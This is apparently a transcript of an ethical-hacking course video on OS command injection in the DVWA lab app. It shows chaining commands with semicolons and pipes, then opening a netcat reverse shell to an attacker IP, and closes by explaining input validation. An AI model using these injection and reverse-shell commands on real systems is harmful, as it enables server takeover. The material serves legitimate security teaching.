Code execution vulnerabilities. These type of vulnerabilities allow us to execute operating system code on the target server. So if the target server uses Windows, we'll be able to execute Windows commands. If it uses Linux, then we'll be able to use Linux commands. Clearly, this is a really critical problem that would allow us to do anything we want with the target, really. We can upload a PHP shell using a wget command, or upload a payload, a virus, anything we want using the wget Linux command. You just need to make sure that you're uploading it to a file or to a directory which you're allowed to write stuff to. Another way of exploiting this vulnerability is to just run OS commands and get a reverse shell based on these commands. So because we can run operating system commands, we can use the programming languages supported by that operating system to try and get a reverse connection on our computer. So first of all, let's just assume that we're browsing here and we're going around, and then we got to a tab in the website where it allows you to, for example, do a ping. Now what you should do is you should always try to experiment with any input box you see. Try to see what that input box does and what can you inject into it. What can you do to get stuff running? So for example, this input box is telling you it's going to do a ping. And if you put an IP, for example, I'm going to put 10.20.14.203, which is my own IP, just to use it as a normal person. And I'm going to do a submit, and it's going to go ahead and ping it for me and give me the ping results. So what looks like here, it's actually executing the ping command in Linux systems. Now, let's see if we can exploit that. If it's actually executing the ping command. So what it's doing is, it's going and it's doing, so we're sending 10.20.14.203 as the ping, and then it's going to the web server, and the web server is doing ping 10.20.14.203. So let's see if we can exploit this. How would we exploit it if it's taking what we're inputting right here, and then it's doing ping that? Now in Linux and Unix based commands, you can use this sign to execute multiple commands on one line. So if you do this, if for example in your own terminal, so I'm just going to go to my terminal here, and I'm just going to do ls, which is the list command, and then pwd is what shows your working directory. So if I do an ls followed by this sign and then do pwd, it'll execute both commands. So it'll do this, and then it'll show where the working directory is. So we can do the same thing with this and see if it works for us. So we're going to put an IP, a right IP, and then I'm just going to do pwd and see if it'll execute the pwd for me. If it does, then this is a code execution vulnerability, and I can execute anything I want on the server. So let's see what's going to happen. I pasted this, and I'm going to hit submit. And as we can see, we got the ping results, but at the end, we got our current working directory. So it's var www dvwa vulnerabilities and exec. So it executed the pwd that I inserted. And that means I can insert any commands I want in there and they'll be executed. So I've inserted a resources file that you can use to get reverse connection from the target computer. Now there's a number of ways, a number of commands that would give you a reverse connection. All of these commands depend on the programming language. So for example, we have commands in PHP, we have commands in Ruby, you have Perl commands, and we have the one for Bash. Bash is the Linux shell command language. So all Unix operating systems will be able to execute Bash commands. So that's a very good way of doing it. So most Unix system, this command should work on most Unix based systems. So this would be a really good way of doing it. Again, most of them would have Python, so Python would be a good way. Netcat, most of them do have Netcat as well, so Netcat is a good way of doing that. And we're actually going to use Netcat in this video. So what I'm going to do is first I'm going to listen for connections, just like we used to do with Metasploit when we used to do multi-handler. You can actually use a multi-handler for this and listen for connections, but I'm just going to keep it simpler and show you a new way. And I'm going to use netcat. So netcat. Netcat is just a tool that allows you to listen and connect computers together. So I'm going to listen on port 8080. So netcat is the program. VV is just to see verbose output, so we can see a lot of output. Anything goes wrong, we can see it. And we're telling it to listen using the L option on port 8080. So I'm going to hit enter, and that's saying it's just listening on port 8080. That's all it's going to do. The next command we're going to do is we're going to try to connect from the web server back to my computer using netcat as well. So we're assuming the web server has netcat. We're going to try it and see if that works. So the command is very simple. It's netcat, and we're telling it to use the bin bash, and we're giving it the IP of my device, my attacker device, which is 10.20.14, and then the port, which is 8080, which is we're listening on right here. So I'm gonna copy that, and I'm just gonna execute it the same way we used to execute the pwd command. So the last thing we did was 10.20.14.203, and then we did pwd. So what I'm gonna do now, I'm gonna remove the pwd and paste the code that we just created, which will try to connect from the web server back to the Kali machine, to the attacker machine. And I'm gonna come here, and as you can see, we got a connection back from to us from 10.20.14.204. So that's the target computer. And if we do a pwd, you'll see that we have a reverse shell. If we do an ls, if we do an id, you'll see that we're www data. And if we do a uname a, just to confirm that I'm in the Metasploitable, and you can see that I'm in the Metasploitable, and I'm able to run any command that I want on the target computer. So basically, I have full access to the target computer. Okay, now that we managed to execute commands on the server using the low security settings, let's see if we can set it up to medium and if we can do the same after increasing the security. So we covered the basic case, and now I'm going to go to security, and I'm going to set the security level to medium. I'm going to submit this. Then we're going to go back to our command execution, and I'm going to input my IP. Now I just want to note that my IP is different now. If you notice that the IP of the server right now is 209 and my machine IP is 208. If I do ifconfig, you can see that the IP of my Kali machine is 208. So I'm going to try to ping the Kali machine. Let's just first see if we can ping something. So we're assuming that we don't know this website. And again, this is going from a black box point of view. So we're not going to look at the source code. So we're just going to run. This website's telling us it's going to ping stuff for us. So I'm just going to put the IP of the Kali and see if the ping works. So we're just going to put 10. And as you can see now, the ping command is working. Now let's see and try to do what we did before. So we put the IP, and then we use the semicolon to say that run this command and this command. And in the low security settings, this used to work for us. So we're going to submit this. And at the bottom, it should show us our current working directory because we have the pwd here. So I'm submitting this. And as you can see, nothing got executed. So not even the ping command got executed. So again, looking from a black box point of view, we're going to think, oh, maybe they're using some sort of filtering on the semicolon. So they're checking if the command contains a semicolon, then they're going to ignore that command and not run it. So we're just going to try to use another trick, something similar to the semicolon. So what we used to do before, we had an example of doing ls. So that's the list command, and the pwd is what shows the working directory. And we can combine these two by doing ls, semicolon, and then we do the pwd. And that will do both. It will do the ls and the pwd. So that way used to work for us doesn't work anymore because they're probably filtering based on this specific character. So what we're gonna do is we're gonna use something else available for us in the Unix commands, which is the pipe. So piping is really useful when it comes to Unix. You'll use it a lot. What it basically does, it means run the first command, and once you run that command, send the output or pipe the output to this command and run the second command on it. So essentially, it'll run two commands in our case. Now you can use pipe for a lot of things, and it's used into regex and things like that. For us, all we want to do is we're interested into getting the second command to run. So let's have an example of this. So we're going to do ls, which is going to be similar to our ping. And then we're going to put the pipe character, which is the vertical bar. And then we're going to put the second command that the ls output should be passed to. Now, pwd doesn't expect any input to be passed to it. So at the moment when we run this, it'll basically run both, but it won't show you the result of running ls. It'll feed it to pwd and show you the result of pwd. So when I hit enter, you'll see that pwd got executed. So in our example, what's happening is we have a ping. Then we're inputting our IP, so we're going to put our IP. And then we're going to use the bar character, and we're going to put the second command that we want to run, which will be the command that will give us shell on the server. But for the testing, we're just going to do a pwd. And again, as you can see, we don't see the result of the ping. We only see the result of the pwd. Because again, for the third time, this command, it will run this and feed the output to pwd. So let's try this in here. So we're gonna put our IP again, like we did before, and we used to put pwd like that, but I'm just gonna put my bar character, hit enter, and as you can see, the second command got executed and we got our current working directory. Now we can modify this to get a shell on our computer. So again, we're going to use the bar, and we're going to get it to, we're going to use the exact same method that we used last time. So we're going to do nc -e, input my IP, and then I'm going to put the port, which is 8080. Now, before I execute this, I'm going to listen on port 8080 for connection here, and we're going to use the same command like before, use a netcat. So nc vv lp 8080. This is listening, and we're going to connect back from here to the Kali, hit submit, and sure enough, we get a connection here that allows us to run any command we want on the server. So we can do pwd now, we can list the files, we can get our ID, or do anything we want on the current server. So we basically managed to gain access to that website. Let's talk about how we can prevent these vulnerabilities now. In these exploits, we were able to run any code we wanted on the target computer. Again, this functionality should be avoided. You should avoid allowing users to run any sort of code on your server. Try to avoid all these functions such as the eval, pass-through, and all these functions that allow a user to run operating system code on the server. If you absolutely had to use something like it, then make sure you analyze the input before you execute it. For example, in the example we seen, where the code was doing a ping, and it'll ping anything we put in the text box. So I'm putting here a / text box just to show that this is the input that we put in the text box. This is what the program actually looks like. If it looks complicated, forget about it. We're just talking about the concept here. So we're going to be talking about this here. So say, for example, you put, what we did is we put a normal IP, and then we put the semicolon, and then we put a command that we wanted to do. So we did, for example, lsla. The problem with this is the web application used to take this the way it is, copy it, and run it in here, which will, when you execute this command, it will do the ping first, and then it will do the ls-la, which is the command that we wanted. What you need to do is, for example, if you had to do it, what I advise is you just don't use these functions. If you had to use a function like this, then what you should do is check that the input is what you're expecting. For example, you're expecting an IP address and nothing else. So you can use regex to make sure. Now, I'm not going to talk about regex or what regex is. Regex is basically a rule that will make sure that the input looks on the following format. So it takes a digit, digit, dot, digit, digit, dot, digit, digit, dot, digit, digit, which if I put anything else, then the web application should refuse it. And this is exactly what the high security level does for the code. So I know we're talking about black box testing and everything, but I want to show you what a secure code should look like. So if we go to the security settings, and I'm going to set this to high, this is actually called impossible in the new versions of DVWA, but we're using the one that comes with Metasploitable, and it's just called high. So the reason why they called it impossible, because it's very secure. So if we go to the command execution again, and I'm just going to view the source to show you what they're doing. So they're implementing a way very similar to using regex. I think using regex could be a bit nicer in terms of like the look of the code, but they're using the same concept. So basically what they have is they have the target right here. So this is what you input, this is what we put in here. So whatever you type in here is going to come up as this variable right here, the $target. So the first thing that they're doing is they're stripping the slashes from it. After they do that, they're dividing the IP using this function. So what this function does, it divides the IP based on the dot. So we have number dot number dot number dot number. So they're dividing this dot into an array. So for example, if you have an IP, let's say, so when we input our IP, which is 10.20.14.208, what this function does, what the explode function does right here, it'll divide this into an array of 4 elements. So the array is going to be something like this. It'll be 10, 20, 14, 208. Okay, and each one of these elements can be accessed based on its number right here. So what they do is they check if each one of these elements is a number. So it checks if it's numeric for the octet for the 0, for the 1, for the 2, and for the 3. And that checks for this element, this element, this element, and this element. So they're making sure that we have a number. So when we try to inject our code right here, regardless of what characters we use or what tricks we use, as long as we're going to input characters in here, for example, PWD, the characters are going to go into here as well, into the last element. And when this last element gets checked in using this function, using the isNumeric function, it will give an error because obviously this is not a number. 208 semicolon PWD is not a number, and that will give us an error saying that we have entered an invalid IP. So the best way to do this again is to make sure what the user inputted is what you're expecting. In this case, we're expecting a number dot number dot number. So dividing this into 4 elements and make sure each one of these elements is a number will help us to protect this input and validate the input that it is correct, and it won't be and hackers won't be able to use it to hack into our server.